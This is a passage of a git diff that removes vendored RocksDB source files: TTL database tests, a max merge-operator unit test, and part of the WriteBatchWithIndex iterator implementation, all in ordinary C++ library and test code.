-                         bool check = true, bool test_compaction_change = false,
-                         ColumnFamilyHandle* cf = nullptr) {
-    ASSERT_TRUE(db_ttl_);
-
-    env_->Sleep(slp_tim);
-    ManualCompact(cf);
-    static ReadOptions ropts;
-    kv_it_ = kvmap_.begin();
-    advance(kv_it_, st_pos);
-    std::string v;
-    for (int64_t i = 0; kv_it_ != kvmap_.end() && i < span; i++, ++kv_it_) {
-      Status s = (cf == nullptr) ? db_ttl_->Get(ropts, kv_it_->first, &v)
-                                 : db_ttl_->Get(ropts, cf, kv_it_->first, &v);
-      if (s.ok() != check) {
-        fprintf(stderr, "key=%s ", kv_it_->first.c_str());
-        if (!s.ok()) {
-          fprintf(stderr, "is absent from db but was expected to be present\n");
-        } else {
-          fprintf(stderr, "is present in db but was expected to be absent\n");
-        }
-        FAIL();
-      } else if (s.ok()) {
-          if (test_compaction_change && v.compare(kNewValue_) != 0) {
-            fprintf(stderr, " value for key=%s present in database is %s but "
-                            " should be %s\n", kv_it_->first.c_str(), v.c_str(),
-                            kNewValue_.c_str());
-            FAIL();
-          } else if (!test_compaction_change && v.compare(kv_it_->second) !=0) {
-            fprintf(stderr, " value for key=%s present in database is %s but "
-                            " should be %s\n", kv_it_->first.c_str(), v.c_str(),
-                            kv_it_->second.c_str());
-            FAIL();
-          }
-      }
-    }
-  }
-
-  // Similar as SleepCompactCheck but uses TtlIterator to read from db
-  void SleepCompactCheckIter(int slp, int st_pos, int64_t span,
-                             bool check = true) {
-    ASSERT_TRUE(db_ttl_);
-    env_->Sleep(slp);
-    ManualCompact();
-    static ReadOptions ropts;
-    Iterator *dbiter = db_ttl_->NewIterator(ropts);
-    kv_it_ = kvmap_.begin();
-    advance(kv_it_, st_pos);
-
-    dbiter->Seek(kv_it_->first);
-    if (!check) {
-      if (dbiter->Valid()) {
-        ASSERT_NE(dbiter->value().compare(kv_it_->second), 0);
-      }
-    } else {  // dbiter should have found out kvmap_[st_pos]
-      for (int64_t i = st_pos; kv_it_ != kvmap_.end() && i < st_pos + span;
-           i++, ++kv_it_) {
-        ASSERT_TRUE(dbiter->Valid());
-        ASSERT_EQ(dbiter->value().compare(kv_it_->second), 0);
-        dbiter->Next();
-      }
-    }
-    delete dbiter;
-  }
-
-  class TestFilter : public CompactionFilter {
-   public:
-    TestFilter(const int64_t kSampleSize, const std::string& kNewValue)
-      : kSampleSize_(kSampleSize),
-        kNewValue_(kNewValue) {
-    }
-
-    // Works on keys of the form "key<number>"
-    // Drops key if number at the end of key is in [0, kSampleSize_/3),
-    // Keeps key if it is in [kSampleSize_/3, 2*kSampleSize_/3),
-    // Change value if it is in [2*kSampleSize_/3, kSampleSize_)
-    // Eg. kSampleSize_=6. Drop:key0-1...Keep:key2-3...Change:key4-5...
-    virtual bool Filter(int level, const Slice& key,
-                        const Slice& value, std::string* new_value,
-                        bool* value_changed) const override {
-      assert(new_value != nullptr);
-
-      std::string search_str = "0123456789";
-      std::string key_string = key.ToString();
-      size_t pos = key_string.find_first_of(search_str);
-      int num_key_end;
-      if (pos != std::string::npos) {
-        auto key_substr = key_string.substr(pos, key.size() - pos);
-#ifndef CYGWIN
-        num_key_end = std::stoi(key_substr);
-#else
-        num_key_end = std::strtol(key_substr.c_str(), 0, 10);
-#endif
-
-      } else {
-        return false; // Keep keys not matching the format "key<NUMBER>"
-      }
-
-      int64_t partition = kSampleSize_ / 3;
-      if (num_key_end < partition) {
-        return true;
-      } else if (num_key_end < partition * 2) {
-        return false;
-      } else {
-        *new_value = kNewValue_;
-        *value_changed = true;
-        return false;
-      }
-    }
-
-    virtual const char* Name() const override {
-      return "TestFilter";
-    }
-
-   private:
-    const int64_t kSampleSize_;
-    const std::string kNewValue_;
-  };
-
-  class TestFilterFactory : public CompactionFilterFactory {
-    public:
-      TestFilterFactory(const int64_t kSampleSize, const std::string& kNewValue)
-        : kSampleSize_(kSampleSize),
-          kNewValue_(kNewValue) {
-      }
-
-      virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-          const CompactionFilter::Context& context) override {
-        return std::unique_ptr<CompactionFilter>(
-            new TestFilter(kSampleSize_, kNewValue_));
-      }
-
-      virtual const char* Name() const override {
-        return "TestFilterFactory";
-      }
-
-    private:
-      const int64_t kSampleSize_;
-      const std::string kNewValue_;
-  };
-
-
-  // Choose carefully so that Put, Gets & Compaction complete in 1 second buffer
-  static const int64_t kSampleSize_ = 100;
-  std::string dbname_;
-  DBWithTTL* db_ttl_;
-  unique_ptr<SpecialTimeEnv> env_;
-
- private:
-  Options options_;
-  KVMap kvmap_;
-  KVMap::iterator kv_it_;
-  const std::string kNewValue_ = "new_value";
-  unique_ptr<CompactionFilter> test_comp_filter_;
-}; // class TtlTest
-
-// If TTL is non positive or not provided, the behaviour is TTL = infinity
-// This test opens the db 3 times with such default behavior and inserts a
-// bunch of kvs each time. All kvs should accumulate in the db till the end
-// Partitions the sample-size provided into 3 sets over boundary1 and boundary2
-TEST_F(TtlTest, NoEffect) {
-  MakeKVMap(kSampleSize_);
-  int64_t boundary1 = kSampleSize_ / 3;
-  int64_t boundary2 = 2 * boundary1;
-
-  OpenTtl();
-  PutValues(0, boundary1);                       //T=0: Set1 never deleted
-  SleepCompactCheck(1, 0, boundary1);            //T=1: Set1 still there
-  CloseTtl();
-
-  OpenTtl(0);
-  PutValues(boundary1, boundary2 - boundary1);   //T=1: Set2 never deleted
-  SleepCompactCheck(1, 0, boundary2);            //T=2: Sets1 & 2 still there
-  CloseTtl();
-
-  OpenTtl(-1);
-  PutValues(boundary2, kSampleSize_ - boundary2); //T=3: Set3 never deleted
-  SleepCompactCheck(1, 0, kSampleSize_, true);    //T=4: Sets 1,2,3 still there
-  CloseTtl();
-}
-
-// Puts a set of values and checks its presence using Get during ttl
-TEST_F(TtlTest, PresentDuringTTL) {
-  MakeKVMap(kSampleSize_);
-
-  OpenTtl(2);                                 // T=0:Open the db with ttl = 2
-  PutValues(0, kSampleSize_);                  // T=0:Insert Set1. Delete at t=2
-  SleepCompactCheck(1, 0, kSampleSize_, true); // T=1:Set1 should still be there
-  CloseTtl();
-}
-
-// Puts a set of values and checks its absence using Get after ttl
-TEST_F(TtlTest, AbsentAfterTTL) {
-  MakeKVMap(kSampleSize_);
-
-  OpenTtl(1);                                  // T=0:Open the db with ttl = 2
-  PutValues(0, kSampleSize_);                  // T=0:Insert Set1. Delete at t=2
-  SleepCompactCheck(2, 0, kSampleSize_, false); // T=2:Set1 should not be there
-  CloseTtl();
-}
-
-// Resets the timestamp of a set of kvs by updating them and checks that they
-// are not deleted according to the old timestamp
-TEST_F(TtlTest, ResetTimestamp) {
-  MakeKVMap(kSampleSize_);
-
-  OpenTtl(3);
-  PutValues(0, kSampleSize_);            // T=0: Insert Set1. Delete at t=3
-  env_->Sleep(2);                        // T=2
-  PutValues(0, kSampleSize_);            // T=2: Insert Set1. Delete at t=5
-  SleepCompactCheck(2, 0, kSampleSize_); // T=4: Set1 should still be there
-  CloseTtl();
-}
-
-// Similar to PresentDuringTTL but uses Iterator
-TEST_F(TtlTest, IterPresentDuringTTL) {
-  MakeKVMap(kSampleSize_);
-
-  OpenTtl(2);
-  PutValues(0, kSampleSize_);                 // T=0: Insert. Delete at t=2
-  SleepCompactCheckIter(1, 0, kSampleSize_);  // T=1: Set should be there
-  CloseTtl();
-}
-
-// Similar to AbsentAfterTTL but uses Iterator
-TEST_F(TtlTest, IterAbsentAfterTTL) {
-  MakeKVMap(kSampleSize_);
-
-  OpenTtl(1);
-  PutValues(0, kSampleSize_);                      // T=0: Insert. Delete at t=1
-  SleepCompactCheckIter(2, 0, kSampleSize_, false); // T=2: Should not be there
-  CloseTtl();
-}
-
-// Checks presence while opening the same db more than once with the same ttl
-// Note: The second open will open the same db
-TEST_F(TtlTest, MultiOpenSamePresent) {
-  MakeKVMap(kSampleSize_);
-
-  OpenTtl(2);
-  PutValues(0, kSampleSize_);                   // T=0: Insert. Delete at t=2
-  CloseTtl();
-
-  OpenTtl(2);                                  // T=0. Delete at t=2
-  SleepCompactCheck(1, 0, kSampleSize_);        // T=1: Set should be there
-  CloseTtl();
-}
-
-// Checks absence while opening the same db more than once with the same ttl
-// Note: The second open will open the same db
-TEST_F(TtlTest, MultiOpenSameAbsent) {
-  MakeKVMap(kSampleSize_);
-
-  OpenTtl(1);
-  PutValues(0, kSampleSize_);                   // T=0: Insert. Delete at t=1
-  CloseTtl();
-
-  OpenTtl(1);                                  // T=0.Delete at t=1
-  SleepCompactCheck(2, 0, kSampleSize_, false); // T=2: Set should not be there
-  CloseTtl();
-}
-
-// Checks presence while opening the same db more than once with bigger ttl
-TEST_F(TtlTest, MultiOpenDifferent) {
-  MakeKVMap(kSampleSize_);
-
-  OpenTtl(1);
-  PutValues(0, kSampleSize_);            // T=0: Insert. Delete at t=1
-  CloseTtl();
-
-  OpenTtl(3);                           // T=0: Set deleted at t=3
-  SleepCompactCheck(2, 0, kSampleSize_); // T=2: Set should be there
-  CloseTtl();
-}
-
-// Checks presence during ttl in read_only mode
-TEST_F(TtlTest, ReadOnlyPresentForever) {
-  MakeKVMap(kSampleSize_);
-
-  OpenTtl(1);                                 // T=0:Open the db normally
-  PutValues(0, kSampleSize_);                  // T=0:Insert Set1. Delete at t=1
-  CloseTtl();
-
-  OpenReadOnlyTtl(1);
-  SleepCompactCheck(2, 0, kSampleSize_);       // T=2:Set1 should still be there
-  CloseTtl();
-}
-
-// Checks whether WriteBatch works well with TTL
-// Puts all kvs in kvmap_ in a batch and writes first, then deletes first half
-TEST_F(TtlTest, WriteBatchTest) {
-  MakeKVMap(kSampleSize_);
-  BatchOperation batch_ops[kSampleSize_];
-  for (int i = 0; i < kSampleSize_; i++) {
-    batch_ops[i] = OP_PUT;
-  }
-
-  OpenTtl(2);
-  MakePutWriteBatch(batch_ops, kSampleSize_);
-  for (int i = 0; i < kSampleSize_ / 2; i++) {
-    batch_ops[i] = OP_DELETE;
-  }
-  MakePutWriteBatch(batch_ops, kSampleSize_ / 2);
-  SleepCompactCheck(0, 0, kSampleSize_ / 2, false);
-  SleepCompactCheck(0, kSampleSize_ / 2, kSampleSize_ - kSampleSize_ / 2);
-  CloseTtl();
-}
-
-// Checks user's compaction filter for correctness with TTL logic
-TEST_F(TtlTest, CompactionFilter) {
-  MakeKVMap(kSampleSize_);
-
-  OpenTtlWithTestCompaction(1);
-  PutValues(0, kSampleSize_);                  // T=0:Insert Set1. Delete at t=1
-  // T=2: TTL logic takes precedence over TestFilter:-Set1 should not be there
-  SleepCompactCheck(2, 0, kSampleSize_, false);
-  CloseTtl();
-
-  OpenTtlWithTestCompaction(3);
-  PutValues(0, kSampleSize_);                   // T=0:Insert Set1.
-  int64_t partition = kSampleSize_ / 3;
-  SleepCompactCheck(1, 0, partition, false);                  // Part dropped
-  SleepCompactCheck(0, partition, partition);                 // Part kept
-  SleepCompactCheck(0, 2 * partition, partition, true, true); // Part changed
-  CloseTtl();
-}
-
-// Insert some key-values which KeyMayExist should be able to get and check that
-// values returned are fine
-TEST_F(TtlTest, KeyMayExist) {
-  MakeKVMap(kSampleSize_);
-
-  OpenTtl();
-  PutValues(0, kSampleSize_, false);
-
-  SimpleKeyMayExistCheck();
-
-  CloseTtl();
-}
-
-TEST_F(TtlTest, MultiGetTest) {
-  MakeKVMap(kSampleSize_);
-
-  OpenTtl();
-  PutValues(0, kSampleSize_, false);
-
-  SimpleMultiGetTest();
-
-  CloseTtl();
-}
-
-TEST_F(TtlTest, ColumnFamiliesTest) {
-  DB* db;
-  Options options;
-  options.create_if_missing = true;
-  options.env = env_.get();
-
-  DB::Open(options, dbname_, &db);
-  ColumnFamilyHandle* handle;
-  ASSERT_OK(db->CreateColumnFamily(ColumnFamilyOptions(options),
-                                   "ttl_column_family", &handle));
-
-  delete handle;
-  delete db;
-
-  std::vector<ColumnFamilyDescriptor> column_families;
-  column_families.push_back(ColumnFamilyDescriptor(
-      kDefaultColumnFamilyName, ColumnFamilyOptions(options)));
-  column_families.push_back(ColumnFamilyDescriptor(
-      "ttl_column_family", ColumnFamilyOptions(options)));
-
-  std::vector<ColumnFamilyHandle*> handles;
-
-  ASSERT_OK(DBWithTTL::Open(DBOptions(options), dbname_, column_families,
-                            &handles, &db_ttl_, {3, 5}, false));
-  ASSERT_EQ(handles.size(), 2U);
-  ColumnFamilyHandle* new_handle;
-  ASSERT_OK(db_ttl_->CreateColumnFamilyWithTtl(options, "ttl_column_family_2",
-                                               &new_handle, 2));
-  handles.push_back(new_handle);
-
-  MakeKVMap(kSampleSize_);
-  PutValues(0, kSampleSize_, false, handles[0]);
-  PutValues(0, kSampleSize_, false, handles[1]);
-  PutValues(0, kSampleSize_, false, handles[2]);
-
-  // everything should be there after 1 second
-  SleepCompactCheck(1, 0, kSampleSize_, true, false, handles[0]);
-  SleepCompactCheck(0, 0, kSampleSize_, true, false, handles[1]);
-  SleepCompactCheck(0, 0, kSampleSize_, true, false, handles[2]);
-
-  // only column family 1 should be alive after 4 seconds
-  SleepCompactCheck(3, 0, kSampleSize_, false, false, handles[0]);
-  SleepCompactCheck(0, 0, kSampleSize_, true, false, handles[1]);
-  SleepCompactCheck(0, 0, kSampleSize_, false, false, handles[2]);
-
-  // nothing should be there after 6 seconds
-  SleepCompactCheck(2, 0, kSampleSize_, false, false, handles[0]);
-  SleepCompactCheck(0, 0, kSampleSize_, false, false, handles[1]);
-  SleepCompactCheck(0, 0, kSampleSize_, false, false, handles[2]);
-
-  for (auto h : handles) {
-    delete h;
-  }
-  delete db_ttl_;
-  db_ttl_ = nullptr;
-}
-
-} //  namespace rocksdb
-
-// A black-box test for the ttl wrapper around rocksdb
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as DBWithTTL is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/util_merge_operators_test.cc b/thirdparty/rocksdb/utilities/util_merge_operators_test.cc
deleted file mode 100644
index d8b3cfb..0000000
--- a/thirdparty/rocksdb/utilities/util_merge_operators_test.cc
+++ /dev/null
@@ -1,99 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "utilities/merge_operators.h"
-
-namespace rocksdb {
-
-class UtilMergeOperatorTest : public testing::Test {
- public:
-  UtilMergeOperatorTest() {}
-
-  std::string FullMergeV2(std::string existing_value,
-                          std::vector<std::string> operands,
-                          std::string key = "") {
-    std::string result;
-    Slice result_operand(nullptr, 0);
-
-    Slice existing_value_slice(existing_value);
-    std::vector<Slice> operands_slice(operands.begin(), operands.end());
-
-    const MergeOperator::MergeOperationInput merge_in(
-        key, &existing_value_slice, operands_slice, nullptr);
-    MergeOperator::MergeOperationOutput merge_out(result, result_operand);
-    merge_operator_->FullMergeV2(merge_in, &merge_out);
-
-    if (result_operand.data()) {
-      result.assign(result_operand.data(), result_operand.size());
-    }
-    return result;
-  }
-
-  std::string FullMergeV2(std::vector<std::string> operands,
-                          std::string key = "") {
-    std::string result;
-    Slice result_operand(nullptr, 0);
-
-    std::vector<Slice> operands_slice(operands.begin(), operands.end());
-
-    const MergeOperator::MergeOperationInput merge_in(key, nullptr,
-                                                      operands_slice, nullptr);
-    MergeOperator::MergeOperationOutput merge_out(result, result_operand);
-    merge_operator_->FullMergeV2(merge_in, &merge_out);
-
-    if (result_operand.data()) {
-      result.assign(result_operand.data(), result_operand.size());
-    }
-    return result;
-  }
-
-  std::string PartialMerge(std::string left, std::string right,
-                           std::string key = "") {
-    std::string result;
-
-    merge_operator_->PartialMerge(key, left, right, &result, nullptr);
-    return result;
-  }
-
-  std::string PartialMergeMulti(std::deque<std::string> operands,
-                                std::string key = "") {
-    std::string result;
-    std::deque<Slice> operands_slice(operands.begin(), operands.end());
-
-    merge_operator_->PartialMergeMulti(key, operands_slice, &result, nullptr);
-    return result;
-  }
-
- protected:
-  std::shared_ptr<MergeOperator> merge_operator_;
-};
-
-TEST_F(UtilMergeOperatorTest, MaxMergeOperator) {
-  merge_operator_ = MergeOperators::CreateMaxOperator();
-
-  EXPECT_EQ("B", FullMergeV2("B", {"A"}));
-  EXPECT_EQ("B", FullMergeV2("A", {"B"}));
-  EXPECT_EQ("", FullMergeV2({"", "", ""}));
-  EXPECT_EQ("A", FullMergeV2({"A"}));
-  EXPECT_EQ("ABC", FullMergeV2({"ABC"}));
-  EXPECT_EQ("Z", FullMergeV2({"ABC", "Z", "C", "AXX"}));
-  EXPECT_EQ("ZZZ", FullMergeV2({"ABC", "CC", "Z", "ZZZ"}));
-  EXPECT_EQ("a", FullMergeV2("a", {"ABC", "CC", "Z", "ZZZ"}));
-
-  EXPECT_EQ("z", PartialMergeMulti({"a", "z", "efqfqwgwew", "aaz", "hhhhh"}));
-
-  EXPECT_EQ("b", PartialMerge("a", "b"));
-  EXPECT_EQ("z", PartialMerge("z", "azzz"));
-  EXPECT_EQ("a", PartialMerge("a", ""));
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/utilities/write_batch_with_index/write_batch_with_index.cc b/thirdparty/rocksdb/utilities/write_batch_with_index/write_batch_with_index.cc
deleted file mode 100644
index b282010..0000000
--- a/thirdparty/rocksdb/utilities/write_batch_with_index/write_batch_with_index.cc
+++ /dev/null
@@ -1,876 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/write_batch_with_index.h"
-
-#include <limits>
-#include <memory>
-
-#include "db/column_family.h"
-#include "db/db_impl.h"
-#include "db/merge_context.h"
-#include "db/merge_helper.h"
-#include "memtable/skiplist.h"
-#include "options/db_options.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/iterator.h"
-#include "util/arena.h"
-#include "utilities/write_batch_with_index/write_batch_with_index_internal.h"
-
-namespace rocksdb {
-
-// when direction == forward
-// * current_at_base_ <=> base_iterator > delta_iterator
-// when direction == backwards
-// * current_at_base_ <=> base_iterator < delta_iterator
-// always:
-// * equal_keys_ <=> base_iterator == delta_iterator
-class BaseDeltaIterator : public Iterator {
- public:
-  BaseDeltaIterator(Iterator* base_iterator, WBWIIterator* delta_iterator,
-                    const Comparator* comparator)
-      : forward_(true),
-        current_at_base_(true),
-        equal_keys_(false),
-        status_(Status::OK()),
-        base_iterator_(base_iterator),
-        delta_iterator_(delta_iterator),
-        comparator_(comparator) {}
-
-  virtual ~BaseDeltaIterator() {}
-
-  bool Valid() const override {
-    return current_at_base_ ? BaseValid() : DeltaValid();
-  }
-
-  void SeekToFirst() override {
-    forward_ = true;
-    base_iterator_->SeekToFirst();
-    delta_iterator_->SeekToFirst();
-    UpdateCurrent();
-  }
-
-  void SeekToLast() override {
-    forward_ = false;
-    base_iterator_->SeekToLast();
-    delta_iterator_->SeekToLast();
-    UpdateCurrent();
-  }
-
-  void Seek(const Slice& k) override {
-    forward_ = true;
-    base_iterator_->Seek(k);
-    delta_iterator_->Seek(k);
-    UpdateCurrent();
-  }
-
-  void SeekForPrev(const Slice& k) override {
-    forward_ = false;
-    base_iterator_->SeekForPrev(k);
-    delta_iterator_->SeekForPrev(k);
-    UpdateCurrent();
-  }
-
-  void Next() override {
-    if (!Valid()) {
-      status_ = Status::NotSupported("Next() on invalid iterator");
-    }
-
-    if (!forward_) {
-      // Need to change direction
-      // if our direction was backward and we're not equal, we have two states:
-      // * both iterators are valid: we're already in a good state (current
-      // shows to smaller)
-      // * only one iterator is valid: we need to advance that iterator
-      forward_ = true;
-      equal_keys_ = false;
-      if (!BaseValid()) {
-        assert(DeltaValid());
-        base_iterator_->SeekToFirst();
-      } else if (!DeltaValid()) {
-        delta_iterator_->SeekToFirst();
-      } else if (current_at_base_) {
-        // Change delta from larger than base to smaller
-        AdvanceDelta();
-      } else {
-        // Change base from larger than delta to smaller
-        AdvanceBase();
-      }
-      if (DeltaValid() && BaseValid()) {
-        if (comparator_->Equal(delta_iterator_->Entry().key,
-                               base_iterator_->key())) {
-          equal_keys_ = true;
-        }
-      }
-    }
-    Advance();
-  }
-
-  void Prev() override {
-    if (!Valid()) {
-      status_ = Status::NotSupported("Prev() on invalid iterator");
-    }
-
-    if (forward_) {
-      // Need to change direction
-      // if our direction was backward and we're not equal, we have two states:
-      // * both iterators are valid: we're already in a good state (current
-      // shows to smaller)
-      // * only one iterator is valid: we need to advance that iterator
-      forward_ = false;
-      equal_keys_ = false;
-      if (!BaseValid()) {
-        assert(DeltaValid());
-        base_iterator_->SeekToLast();
-      } else if (!DeltaValid()) {
-        delta_iterator_->SeekToLast();
-      } else if (current_at_base_) {
-        // Change delta from less advanced than base to more advanced
-        AdvanceDelta();
-      } else {
-        // Change base from less advanced than delta to more advanced
-        AdvanceBase();
-      }
-      if (DeltaValid() && BaseValid()) {
-        if (comparator_->Equal(delta_iterator_->Entry().key,
-                               base_iterator_->key())) {
-          equal_keys_ = true;
-        }
-      }
-    }
-
-    Advance();
-  }
-
-  Slice key() const override {
-    return current_at_base_ ? base_iterator_->key()
-                            : delta_iterator_->Entry().key;
-  }
-
-  Slice value() const override {
-    return current_at_base_ ? base_iterator_->value()
-                            : delta_iterator_->Entry().value;
-  }
-
-  Status status() const override {
-    if (!status_.ok()) {
-      return status_;
-    }
-    if (!base_iterator_->status().ok()) {
-      return base_iterator_->status();
-    }
-    return delta_iterator_->status();
-  }
-
- private:
-  void AssertInvariants() {
-#ifndef NDEBUG
-    if (!Valid()) {
-      return;
-    }
-    if (!BaseValid()) {
-      assert(!current_at_base_ && delta_iterator_->Valid());
-      return;
-    }
-    if (!DeltaValid()) {
-      assert(current_at_base_ && base_iterator_->Valid());
-      return;
-    }
-    // we don't support those yet
-    assert(delta_iterator_->Entry().type != kMergeRecord &&
-           delta_iterator_->Entry().type != kLogDataRecord);
-    int compare = comparator_->Compare(delta_iterator_->Entry().key,
-                                       base_iterator_->key());
-    if (forward_) {
-      // current_at_base -> compare < 0
-      assert(!current_at_base_ || compare < 0);
-      // !current_at_base -> compare <= 0
-      assert(current_at_base_ && compare >= 0);
-    } else {
-      // current_at_base -> compare > 0
-      assert(!current_at_base_ || compare > 0);
-      // !current_at_base -> compare <= 0
-      assert(current_at_base_ && compare <= 0);
-    }
-    // equal_keys_ <=> compare == 0
-    assert((equal_keys_ || compare != 0) && (!equal_keys_ || compare == 0));
-#endif
-  }
-
-  void Advance() {
-    if (equal_keys_) {
-      assert(BaseValid() && DeltaValid());
-      AdvanceBase();
-      AdvanceDelta();
-    } else {
-      if (current_at_base_) {
-        assert(BaseValid());
-        AdvanceBase();
-      } else {
-        assert(DeltaValid());
-        AdvanceDelta();
-      }
-    }
-    UpdateCurrent();
-  }
-
-  void AdvanceDelta() {
-    if (forward_) {
-      delta_iterator_->Next();
-    } else {
-      delta_iterator_->Prev();
-    }
-  }
-  void AdvanceBase() {
-    if (forward_) {
-      base_iterator_->Next();
-    } else {
-      base_iterator_->Prev();
-    }
-  }
-  bool BaseValid() const { return base_iterator_->Valid(); }
-  bool DeltaValid() const { return delta_iterator_->Valid(); }
-  void UpdateCurrent() {
-// Suppress false positive clang analyzer warnings.
-#ifndef __clang_analyzer__
-    while (true) {
-      WriteEntry delta_entry;
-      if (DeltaValid()) {
-        delta_entry = delta_iterator_->Entry();
-      }
-      equal_keys_ = false;
-      if (!BaseValid()) {
-        // Base has finished.
-        if (!DeltaValid()) {
-          // Finished
-          return;
-        }
-        if (delta_entry.type == kDeleteRecord ||
-            delta_entry.type == kSingleDeleteRecord) {
-          AdvanceDelta();
-        } else {
-          current_at_base_ = false;
-          return;
-        }
-      } else if (!DeltaValid()) {
-        // Delta has finished.
-        current_at_base_ = true;
-        return;
-      } else {
-        int compare =
-            (forward_ ? 1 : -1) *
-            comparator_->Compare(delta_entry.key, base_iterator_->key());
-        if (compare <= 0) {  // delta bigger or equal
-          if (compare == 0) {
-            equal_keys_ = true;
-          }
-          if (delta_entry.type != kDeleteRecord &&
-              delta_entry.type != kSingleDeleteRecord) {
-            current_at_base_ = false;
-            return;
-          }
-          // Delta is less advanced and is delete.
-          AdvanceDelta();
-          if (equal_keys_) {
-            AdvanceBase();
-          }
-        } else {
-          current_at_base_ = true;
-          return;
-        }
-      }
-    }
-
-    AssertInvariants();
-#endif  // __clang_analyzer__
-  }
-
-  bool forward_;
-  bool current_at_base_;
-  bool equal_keys_;
-  Status status_;
-  std::unique_ptr<Iterator> base_iterator_;
-  std::unique_ptr<WBWIIterator> delta_iterator_;
-  const Comparator* comparator_;  // not owned
-};
-
-typedef SkipList<WriteBatchIndexEntry*, const WriteBatchEntryComparator&>
-    WriteBatchEntrySkipList;
-
-class WBWIIteratorImpl : public WBWIIterator {
- public:
-  WBWIIteratorImpl(uint32_t column_family_id,
-                   WriteBatchEntrySkipList* skip_list,
-                   const ReadableWriteBatch* write_batch)
-      : column_family_id_(column_family_id),
-        skip_list_iter_(skip_list),
-        write_batch_(write_batch) {}
-
-  virtual ~WBWIIteratorImpl() {}
-
-  virtual bool Valid() const override {
-    if (!skip_list_iter_.Valid()) {
-      return false;
-    }
-    const WriteBatchIndexEntry* iter_entry = skip_list_iter_.key();
-    return (iter_entry != nullptr &&
-            iter_entry->column_family == column_family_id_);
-  }
-
-  virtual void SeekToFirst() override {
-    WriteBatchIndexEntry search_entry(WriteBatchIndexEntry::kFlagMin,
-                                      column_family_id_, 0, 0);
-    skip_list_iter_.Seek(&search_entry);
-  }
-
-  virtual void SeekToLast() override {
-    WriteBatchIndexEntry search_entry(WriteBatchIndexEntry::kFlagMin,
-                                      column_family_id_ + 1, 0, 0);
-    skip_list_iter_.Seek(&search_entry);
-    if (!skip_list_iter_.Valid()) {
-      skip_list_iter_.SeekToLast();
-    } else {
-      skip_list_iter_.Prev();
-    }
-  }
-
-  virtual void Seek(const Slice& key) override {
-    WriteBatchIndexEntry search_entry(&key, column_family_id_);
-    skip_list_iter_.Seek(&search_entry);
-  }
-
-  virtual void SeekForPrev(const Slice& key) override {
-    WriteBatchIndexEntry search_entry(&key, column_family_id_);
-    skip_list_iter_.SeekForPrev(&search_entry);
-  }
-
-  virtual void Next() override { skip_list_iter_.Next(); }
-
-  virtual void Prev() override { skip_list_iter_.Prev(); }
-
-  virtual WriteEntry Entry() const override {
-    WriteEntry ret;
-    Slice blob, xid;
-    const WriteBatchIndexEntry* iter_entry = skip_list_iter_.key();
-    // this is guaranteed with Valid()
-    assert(iter_entry != nullptr &&
-           iter_entry->column_family == column_family_id_);
-    auto s = write_batch_->GetEntryFromDataOffset(
-        iter_entry->offset, &ret.type, &ret.key, &ret.value, &blob, &xid);
-    assert(s.ok());
-    assert(ret.type == kPutRecord || ret.type == kDeleteRecord ||
-           ret.type == kSingleDeleteRecord || ret.type == kDeleteRangeRecord ||
-           ret.type == kMergeRecord);
-    return ret;
-  }
-
-  virtual Status status() const override {
-    // this is in-memory data structure, so the only way status can be non-ok is
-    // through memory corruption
-    return Status::OK();
-  }
-
-  const WriteBatchIndexEntry* GetRawEntry() const {
-    return skip_list_iter_.key();
-  }
-
- private:
-  uint32_t column_family_id_;
-  WriteBatchEntrySkipList::Iterator skip_list_iter_;
-  const ReadableWriteBatch* write_batch_;
-};
-
-struct WriteBatchWithIndex::Rep {
-  explicit Rep(const Comparator* index_comparator, size_t reserved_bytes = 0,
-               size_t max_bytes = 0, bool _overwrite_key = false)
-      : write_batch(reserved_bytes, max_bytes),
-        comparator(index_comparator, &write_batch),
-        skip_list(comparator, &arena),
-        overwrite_key(_overwrite_key),
-        last_entry_offset(0) {}
-  ReadableWriteBatch write_batch;
-  WriteBatchEntryComparator comparator;
-  Arena arena;
-  WriteBatchEntrySkipList skip_list;
-  bool overwrite_key;
-  size_t last_entry_offset;
-
-  // Remember current offset of internal write batch, which is used as
-  // the starting offset of the next record.
-  void SetLastEntryOffset() { last_entry_offset = write_batch.GetDataSize(); }
-
-  // In overwrite mode, find the existing entry for the same key and update it
-  // to point to the current entry.
-  // Return true if the key is found and updated.
-  bool UpdateExistingEntry(ColumnFamilyHandle* column_family, const Slice& key);
-  bool UpdateExistingEntryWithCfId(uint32_t column_family_id, const Slice& key);
-
-  // Add the recent entry to the update.
-  // In overwrite mode, if key already exists in the index, update it.
-  void AddOrUpdateIndex(ColumnFamilyHandle* column_family, const Slice& key);
-  void AddOrUpdateIndex(const Slice& key);
-
-  // Allocate an index entry pointing to the last entry in the write batch and
-  // put it to skip list.
-  void AddNewEntry(uint32_t column_family_id);
-
-  // Clear all updates buffered in this batch.
-  void Clear();
-  void ClearIndex();
-
-  // Rebuild index by reading all records from the batch.
-  // Returns non-ok status on corruption.
-  Status ReBuildIndex();
-};
-
-bool WriteBatchWithIndex::Rep::UpdateExistingEntry(
-    ColumnFamilyHandle* column_family, const Slice& key) {
-  uint32_t cf_id = GetColumnFamilyID(column_family);
-  return UpdateExistingEntryWithCfId(cf_id, key);
-}
-
-bool WriteBatchWithIndex::Rep::UpdateExistingEntryWithCfId(
-    uint32_t column_family_id, const Slice& key) {
-  if (!overwrite_key) {
-    return false;
-  }
-
-  WBWIIteratorImpl iter(column_family_id, &skip_list, &write_batch);
